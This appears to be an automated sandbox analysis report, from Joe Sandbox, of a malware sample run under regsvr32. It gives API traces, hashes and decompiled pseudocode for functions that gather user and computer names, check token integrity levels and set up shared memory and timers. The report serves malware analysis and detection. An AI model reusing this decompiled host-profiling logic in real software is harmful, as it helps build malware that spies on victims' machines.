0x001e20f5
0x001e20fc
0x001e20ff
0x00000000
0x00000000
0x001e2101
0x001e2104
0x001e2107
0x001e210a
0x00000000
0x001e210c
0x001e2116
0x001e211b
0x001e211b
0x00000000
0x001e2149
0x001e2149
0x001e214e
0x001e216d
0x001e216f
0x001e2174
0x001e2175
0x00000000
0x001e2150
0x001e2150
0x001e2156
0x00000000
0x001e2158
0x001e2158
0x001e215d
0x001e215f
0x001e2164
0x001e2165
0x001e217b
0x001e217b
0x001e2183
0x001e218e
0x001e2191
0x001e219c
0x001e219e
0x001e21a0
0x001e21a3
0x00000000
0x001e21a9
0x00000000
0x001e21a9
0x001e21a3
0x001e2156
0x00000000
0x001e214e
0x001e211e
0x001e2120
0x001e2123
0x001e2124
0x001e2124
0x001e2128
0x001e2132
0x001e2132
0x001e2138
0x001e213b
0x001e213b
0x001e2141
0x001e2141
0x001e21be
0x00000000

APIs

memset.NTDLL ref: 001E2037
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 001E2043
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 001E2068
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 001E2084
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001E209D
HeapFree.KERNEL32(00000000,00000000), ref: 001E2132
CloseHandle.KERNEL32(?), ref: 001E2141
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 001E217B
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,001E560C), ref: 001E2191
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001E219C

Part of subcall function 001E1AB8: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04E09308,00000000,?,74B5F710,00000000,74B5F730), ref: 001E1B07
Part of subcall function 001E1AB8: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04E09340,?,00000000,30314549,00000014,004F0053,04E092FC), ref: 001E1BA4
Part of subcall function 001E1AB8: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,001E20B0), ref: 001E1BB6

GetLastError.KERNEL32 ref: 001E21AE

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 5880805d8a7f6744a8047672191f97bc97e3d42a20f488bb68482c57740a27a3
Instruction ID: 41a79bf4a211a2c3b045c09aca364d9f9d1485551b7e75ccf99697171bb72446
Opcode Fuzzy Hash: 5880805d8a7f6744a8047672191f97bc97e3d42a20f488bb68482c57740a27a3
Instruction Fuzzy Hash: AD516AB18016A9AEDF119FD6DC84DEEBFBCEF05360F204116F615B6290D7719A80CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E53F2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 191
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E001E53F2(signed int __edx) {
				signed int _v8;
				long _v12;
				signed int _v16;
				long _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				void* __edi;
				void* __esi;
				void* _t27;
				long _t28;
				long _t31;
				intOrPtr _t32;
				void* _t36;
				signed int _t37;
				intOrPtr _t38;
				void* _t39;
				CHAR* _t42;
				long _t48;
				long _t49;
				void* _t54;
				void* _t56;
				intOrPtr _t64;
				void* _t67;
				long _t71;
				void* _t72;
				signed char _t74;
				intOrPtr _t76;
				signed int _t77;
				long _t82;
				long _t84;
				CHAR* _t87;
				void* _t88;

				_t79 = __edx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t27 = E001E58F8();
				if(_t27 != 0) {
					_t77 =  *0x1ea2b4; // 0x4000000a
					_t73 = (_t77 & 0xf0000000) + _t27;
					 *0x1ea2b4 = (_t77 & 0xf0000000) + _t27;
				}
				_t28 =  *0x1ea148(0, 2);
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E001E696F( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0x1ea2d4; // 0x4c1d5a8
					_push("P�_");
					_push(1);
					_t7 = _t32 + 0x1eb5ad; // 0x4d283a53
					 *0x1ea2f8 = 0xc;
					 *0x1ea300 = 0;
					L001E4AF8();
					_t36 = E001E6384(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E001E4454(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E001E6837(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0x1ea2d4; // 0x4c1d5a8
								_t18 = _t64 + 0x1eb84f; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0x1ea32c = _t87;
						}
						_t38 = E001E60E1();
						 *0x1ea2c8 =  *0x1ea2c8 ^ 0xe8fa7dd7;
						 *0x1ea31c = _t38;
						_t39 = E001E6837(0x60);
						__eflags = _t39;
						 *0x1ea37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0x1ea37c; // 0x4e09630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0x1ea37c; // 0x4e09630
							 *_t56 = 0x1eb83e;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0x1ea290, _t84, 0x43);
							__eflags = _t42;
							 *0x1ea314 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0x1ea2b4; // 0x4000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0x1ea2d4; // 0x4c1d5a8
								_t19 = _t76 + 0x1eb53a; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0x1e92a7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E001E4454( ~_v8 &  *0x1ea2c8, 0x1ea00c); // executed
								_t84 = E001E2206(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E001E1376();
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E001E2022(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E001E2439(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0x1ea14c();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E001E6BE1(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
					_t84 = _t28;
					L35:
					return _t84;
				}
			}

0x001e53f2
0x001e53fd
0x001e5400
0x001e5403
0x001e5406
0x001e540d
0x001e540f
0x001e541b
0x001e541d
0x001e541d
0x001e5426
0x001e542e
0x001e5431
0x001e544b
0x001e5450
0x001e5451
0x001e5453
0x001e5458
0x001e545d
0x001e545f
0x001e5466
0x001e5470
0x001e5476
0x001e5483
0x001e548a
0x001e548f
0x001e548f
0x001e5498
0x001e54c1
0x001e54c4
0x001e54d1
0x001e54d8
0x001e54e4
0x001e54e6
0x001e54e8
0x001e54ed
0x001e54f3
0x001e54f9
0x001e54ff
0x001e5502
0x001e5507
0x001e550f
0x001e5511
0x001e5511
0x001e5514
0x001e5514
0x001e551a
0x001e551f
0x001e5527
0x001e552c
0x001e5531
0x001e5533
0x001e5538
0x001e5567
0x001e553a
0x001e553f
0x001e5544
0x001e5549
0x001e5550
0x001e5556
0x001e555b
0x001e5561
0x001e5561
0x001e5568
0x001e556a
0x001e5579
0x001e557f
0x001e5581
0x001e5586
0x001e55b2
0x001e5588
0x001e5588
0x001e558e
0x001e559b
0x001e55a1
0x001e55a1
0x001e55a9
0x001e55ab
0x001e55b3
0x001e55b5
0x001e55bc
0x001e55c9
0x001e55d3
0x001e55d5
0x001e55d7
0x00000000
0x00000000
0x001e55d9
0x001e55de
0x001e55e0
0x001e55e7
0x001e55eb
0x001e55ee
0x001e5603
0x001e5607
0x001e560c
0x00000000
0x001e560c
0x001e55f0
0x001e55f2
0x00000000
0x00000000
0x001e55f4
0x001e55fd
0x001e55ff
0x001e5601
0x00000000
0x00000000
0x00000000
0x001e5601
0x001e55e4
0x001e55e4
0x001e55b5
0x001e549a
0x001e549a
0x001e549f
0x001e560e
0x001e5612
0x001e561a
0x001e561a
0x00000000
0x001e5612
0x001e54a5
0x001e54a8
0x001e54a8
0x001e54aa
0x001e54ad
0x001e54b5
0x001e54bc
0x00000000
0x001e5622
0x001e5622
0x001e5625
0x001e562a
0x001e562a

APIs

Part of subcall function 001E58F8: GetModuleHandleA.KERNEL32(4C44544E,00000000,001E540B,00000000,00000000,00000000,?,?,?,?,?,001E6BD8,?,00000001), ref: 001E5907

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,P_,00000000), ref: 001E5476
CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,001E6BD8,?,00000001), ref: 001E548F
wsprintfA.USER32 ref: 001E550F
memset.NTDLL ref: 001E553F
RtlInitializeCriticalSection.NTDLL(04E095F0), ref: 001E5550
RtlAllocateHeap.NTDLL(00000008,00000043,00000060), ref: 001E5579
wsprintfA.USER32 ref: 001E55A9

Part of subcall function 001E4454: GetUserNameW.ADVAPI32(00000000,001E55CE), ref: 001E448B
Part of subcall function 001E4454: RtlAllocateHeap.NTDLL(00000000,001E55CE), ref: 001E44A2
Part of subcall function 001E4454: GetUserNameW.ADVAPI32(00000000,001E55CE), ref: 001E44AF
Part of subcall function 001E4454: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,001E55CE,?,?,?,?,?,001E6BD8,?,00000001), ref: 001E44D0
Part of subcall function 001E4454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 001E44F7
Part of subcall function 001E4454: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001E450B
Part of subcall function 001E4454: GetComputerNameW.KERNEL32(00000000,00000000), ref: 001E4518
Part of subcall function 001E4454: HeapFree.KERNEL32(00000000,00000000), ref: 001E4536

Part of subcall function 001E6837: RtlAllocateHeap.NTDLL(00000000,00000000,001E4197), ref: 001E6843

Strings

P_, xrefs: 001E5458

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
String ID: P_
API String ID: 2910951584-345000965
Opcode ID: 6558299b25051fcbd3805a6ac11b145062cd3f10753f548d9e4951ecd58ef6ef
Instruction ID: 74da8457e3bb09dbea6117eff35c5116dbe7e219632708a4e7a33df495077210
Opcode Fuzzy Hash: 6558299b25051fcbd3805a6ac11b145062cd3f10753f548d9e4951ecd58ef6ef
Instruction Fuzzy Hash: 69510571D00E95ABDB20DBA6DC85FAE77FAAF14704F950015F504EB290DB74ED808BA2

Uniqueness

Uniqueness Score: -1.00%

Function 001E6384, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E001E6384(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L001E7D86();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x1ea2d4; // 0x4c1d5a8
				_t5 = _t13 + 0x1eb8a2; // 0x4e08e4a
				_t6 = _t13 + 0x1eb57c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L001E7A6A();
				_t17 = CreateFileMappingW(0xffffffff, 0x1ea2f8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x001e6384
0x001e638c
0x001e6390
0x001e6396
0x001e639b
0x001e63a0
0x001e63a3
0x001e63a6
0x001e63ab
0x001e63ac
0x001e63af
0x001e63b4
0x001e63bb
0x001e63c5
0x001e63c7
0x001e63c8
0x001e63cb
0x001e63e7
0x001e63ed
0x001e63f1
0x001e643f
0x001e63f3
0x001e6400
0x001e6410
0x001e6418
0x001e642a
0x001e642e
0x00000000
0x00000000
0x001e641a
0x001e641d
0x001e6422
0x001e6424
0x001e6424
0x001e6402
0x001e6404
0x001e6430
0x001e6431
0x001e6431
0x001e6400
0x001e6446

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,001E5488,?,00000001,?), ref: 001E6390
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 001E63A6
_snwprintf.NTDLL ref: 001E63CB
CreateFileMappingW.KERNELBASE(000000FF,001EA2F8,00000004,00000000,00001000,?), ref: 001E63E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5488,?), ref: 001E63F9
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 001E6410
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5488), ref: 001E6431
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E5488,?), ref: 001E6439

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: e303558156385a6be52801751207304d67b0d425b7f33050951909b60d91beea
Instruction ID: b98502a0d4c038956952f1042ecb919c96fa4d890440723bbecb1ad5b2c72a42
Opcode Fuzzy Hash: e303558156385a6be52801751207304d67b0d425b7f33050951909b60d91beea
Instruction Fuzzy Hash: 0A213572600694FBD710DFA5DC45F9E77BCAF94790FA04021FA05EB1D0DB709A408B61

Uniqueness

Uniqueness Score: -1.00%

Function 001E113D, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E001E113D(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x1ea2b4 > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E001E6837(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E001E50CA(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x001e114a
0x001e1151
0x001e1158
0x001e116c
0x001e1177
0x001e118f
0x001e119c
0x001e119f
0x001e11a4
0x001e11af
0x001e11b3
0x001e11c2
0x001e11c6
0x001e11e2
0x001e11e2
0x001e11e6
0x001e11e6
0x001e11eb
0x001e11ef
0x001e11f5
0x001e11f6
0x001e11fd
0x001e1203

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 001E116F
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 001E118F
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 001E119F
CloseHandle.KERNEL32(00000000), ref: 001E11EF

Part of subcall function 001E6837: RtlAllocateHeap.NTDLL(00000000,00000000,001E4197), ref: 001E6843

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 001E11C2
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 001E11CA
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 001E11DA

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: e40a531c32dce718955304e68c62beff4465121dbe26bd8fe0b62e21a4969dd6
Instruction ID: 242b361a95f80d47bb5814ae72d604a338e1ce9a693297db637a80db2085afa4
Opcode Fuzzy Hash: e40a531c32dce718955304e68c62beff4465121dbe26bd8fe0b62e21a4969dd6
Instruction Fuzzy Hash: 98212A75900299FFEB119FE5DC84EAEBBB9EF08304F404065F611A62A1D7719A44EB60

Uniqueness

Uniqueness Score: -1.00%

Function 001E624D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E001E624D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x1ea2d4; // 0x4c1d5a8
				_t1 = _t9 + 0x1eb60c; // 0x253d7325
				_t36 = 0;
				_t28 = E001E278C(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x4e09631
					_t40 = E001E6837(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E001E49FE(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E001E50CA(_t40);
						_t42 = E001E7565(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E001E50CA(_t36);
							_t36 = _t42;
						}
						_t43 = E001E52E5(_t36, _t33);
						if(_t43 != 0) {
							E001E50CA(_t36);
							_t36 = _t43;
						}
					}
					E001E50CA(_t28);
				}
				return _t36;
			}

0x001e624d
0x001e6250
0x001e6251
0x001e6258
0x001e625f
0x001e6266
0x001e626a
0x001e6271
0x001e6278
0x001e627d
0x001e6285
0x001e628f
0x001e6293
0x001e6297
0x001e629d
0x001e62a2
0x001e62ac
0x001e62b2
0x001e62b4
0x001e62cb
0x001e62cf
0x001e62d2
0x001e62d7
0x001e62d7
0x001e62e0
0x001e62e4
0x001e62e7
0x001e62ec
0x001e62ec
0x001e62e4
0x001e62ef
0x001e62f4
0x001e62fa

APIs

Part of subcall function 001E278C: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001E6266,253D7325,00000000,00000000,?,00000000,001E70D9), ref: 001E27F3
Part of subcall function 001E278C: sprintf.NTDLL ref: 001E2814

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,001E70D9,00000000,04E09630), ref: 001E6278
lstrlen.KERNEL32(00000000,?,00000000,001E70D9,00000000,04E09630), ref: 001E6280

Part of subcall function 001E6837: RtlAllocateHeap.NTDLL(00000000,00000000,001E4197), ref: 001E6843

strcpy.NTDLL ref: 001E6297
lstrcat.KERNEL32(00000000,00000000), ref: 001E62A2

Part of subcall function 001E49FE: lstrlen.KERNEL32(00000000,00000000,001E70D9,00000000,?,001E62B1,00000000,001E70D9,?,00000000,001E70D9,00000000,04E09630), ref: 001E4A0F

Part of subcall function 001E50CA: RtlFreeHeap.NTDLL(00000000,00000000,001E4239,00000000,00000001,?,00000000,?,?,?,001E6B8D,00000000,?,00000001), ref: 001E50D6

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,001E70D9,?,00000000,001E70D9,00000000,04E09630), ref: 001E62BF

Part of subcall function 001E7565: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,001E62CB,00000000,?,00000000,001E70D9,00000000,04E09630), ref: 001E756F
Part of subcall function 001E7565: _snprintf.NTDLL ref: 001E75CD

Strings

=, xrefs: 001E62B9

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 3b40555671c18725e88bbb68367258368564c17cc200d8b7a72902b1fa451563
Instruction ID: 68531640c4de12a32dfb964005334ff28b8d7b7ef425fbe893340af61de167d5
Opcode Fuzzy Hash: 3b40555671c18725e88bbb68367258368564c17cc200d8b7a72902b1fa451563
Instruction Fuzzy Hash: 2E11C233900FA67787126BBA9C85C7F36AEAF697643054015FA00AB202DF74CD0297E1

Uniqueness

Uniqueness Score: -1.00%

Function 001E161A, Relevance: 9.2, APIs: 6, Instructions: 152
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(00000000), ref: 001E165B
IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 001E16DD
StrStrIW.SHLWAPI(00000000,006E0069), ref: 001E171C
SysFreeString.OLEAUT32(00000000), ref: 001E173E

Part of subcall function 001E6C6D: SysAllocString.OLEAUT32(001E92B0), ref: 001E6CBD

SafeArrayDestroy.OLEAUT32(?), ref: 001E1792
SysFreeString.OLEAUT32(?), ref: 001E17A0

Part of subcall function 001E1FC2: Sleep.KERNELBASE(000001F4), ref: 001E200A

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: 606adb1f98ac9c9da3e33225daa0cf5c3d3309bb0b91be7a32c2553b4ebdb939
Instruction ID: ba57fef65b3cfa7e08c8f31b3aa62dd6b1b8bbc1c626a8fd5b131a7a74e378ac
Opcode Fuzzy Hash: 606adb1f98ac9c9da3e33225daa0cf5c3d3309bb0b91be7a32c2553b4ebdb939
Instruction Fuzzy Hash: 7051FF76900689FFCB10DFE9C8848AEB7B6FF88740B158869E515EB220D731AD45CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001E2902, Relevance: 9.1, APIs: 6, Instructions: 120
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001E1206: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,04E089A0,001E2932,?,?,?,?,?,?,?,?,?,?,?,001E2932), ref: 001E12D2

Part of subcall function 001E43C0: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 001E43FD
Part of subcall function 001E43C0: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 001E442E

SysAllocString.OLEAUT32(?), ref: 001E295E
SysAllocString.OLEAUT32(0070006F), ref: 001E2972
SysAllocString.OLEAUT32(00000000), ref: 001E2984
SysFreeString.OLEAUT32(00000000), ref: 001E29E8
SysFreeString.OLEAUT32(00000000), ref: 001E29F7
SysFreeString.OLEAUT32(00000000), ref: 001E2A02

Memory Dump Source

Source File: 00000003.00000002.581361082.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000003.00000002.581296737.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581561750.00000000001E9000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.581639255.00000000001EA000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.581711524.00000000001EC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1e0000_regsvr32.jbxd

Similarity

API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
String ID:
API String ID: 2831207796-0
Opcode ID: d4fb4f276695613645ce4eb4e78ec6634e376fa3f5fc645a0c4e1cd873bcbfd9
Instruction ID: 1ef0a04adcdad62ebe63f993579b3cd1c69d584f7f6d6cd0559df6f8d6d99da8
Opcode Fuzzy Hash: d4fb4f276695613645ce4eb4e78ec6634e376fa3f5fc645a0c4e1cd873bcbfd9
Instruction Fuzzy Hash: C8316D32D00A49AFDB01DFB9C844A9FB7BAAF48314F144425ED10EB121DB71AD05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001E1D57, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E001E1D57(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x1ea38c);
					_t91 = 0x80000002;
					L6:
					_t59 = E001E4AA6( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
